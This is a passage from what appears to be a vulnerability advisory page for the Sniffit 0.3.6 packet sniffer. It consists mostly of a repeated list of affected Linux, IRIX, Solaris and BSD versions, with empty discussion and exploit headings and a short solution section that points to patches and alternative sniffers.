- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- RedHat Linux 5.1
- RedHat Linux 5.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3 alpha
- S.u.S.E. Linux 6.3
- S.u.S.E. Linux 6.2
- S.u.S.E. Linux 6.1
- S.u.S.E. Linux 6.0
- SGI IRIX 6.5.6
- SGI IRIX 6.5.4
- SGI IRIX 6.5.3 m
- SGI IRIX 6.5.3 f
- SGI IRIX 6.5.3
- SGI IRIX 6.5.2 m
- SGI IRIX 6.5.1
- SGI IRIX 6.5
- SGI IRIX 6.4
- SGI IRIX 6.3
- SGI IRIX 6.2
- SGI IRIX 6.1
- SGI IRIX 6.0.1 XFS
- SGI IRIX 6.0.1
- SGI IRIX 6.0
- Sun Solaris 2.5.1 _x86
- Sun Solaris 2.5.1 _ppc
- Sun Solaris 2.5.1
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86HW5/98
- Sun Solaris 2.6_x86HW3/98
- Sun Solaris 2.6_x86
- Sun Solaris 2.6 HW5/98
- Sun Solaris 2.6 HW3/98
- Sun Solaris 2.6
- Sun Solaris 2.5_x86
- Sun Solaris 2.5
- Sun Solaris 2.4_x86
- Sun Solaris 2.4
- Sun SunOS 4.1.4 -JL
- Sun SunOS 4.1.4
Brecht Claerhout Sniffit 0.3.6 HIP
- Debian Linux 2.2 pre potato
- Debian Linux 2.2
- Debian Linux 2.1
- Debian Linux 2.0 r5
- Debian Linux 2.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- FreeBSD FreeBSD 3.4
- FreeBSD FreeBSD 3.3
- FreeBSD FreeBSD 3.2
- FreeBSD FreeBSD 3.1
- FreeBSD FreeBSD 3.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- RedHat Linux 5.1
- RedHat Linux 5.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3 alpha
- S.u.S.E. Linux 6.3
- S.u.S.E. Linux 6.2
- S.u.S.E. Linux 6.1
- S.u.S.E. Linux 6.0
- SGI IRIX 6.5.6
- SGI IRIX 6.5.4
- SGI IRIX 6.5.3 m
- SGI IRIX 6.5.3 f
- SGI IRIX 6.5.3
- SGI IRIX 6.5.2 m
- SGI IRIX 6.5.1
- SGI IRIX 6.5
- SGI IRIX 6.4
- SGI IRIX 6.3
- SGI IRIX 6.2
- SGI IRIX 6.1
- SGI IRIX 6.0.1 XFS
- SGI IRIX 6.0.1
- SGI IRIX 6.0
- Sun Solaris 2.5.1 _x86
- Sun Solaris 2.5.1 _ppc
- Sun Solaris 2.5.1
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86HW5/98
- Sun Solaris 2.6_x86HW3/98
- Sun Solaris 2.6_x86
- Sun Solaris 2.6 HW5/98
- Sun Solaris 2.6 HW3/98
- Sun Solaris 2.6
- Sun Solaris 2.5_x86
- Sun Solaris 2.5
- Sun Solaris 2.4_x86
- Sun Solaris 2.4
- Sun SunOS 4.1.4 -JL
- Sun SunOS 4.1.4

- Vulnerability discussion


- Exploit

- Solution

Sniffit is not actively maintained or supported. Users are advised to use an alternative packet sniffer such as Snort or dsniff.

Some vendor-specific patches have been created:


Brecht Claerhout Sniffit 0.3.6 HIP

Brecht Claerhout Sniffit 0.3.7 beta

- References

 

 
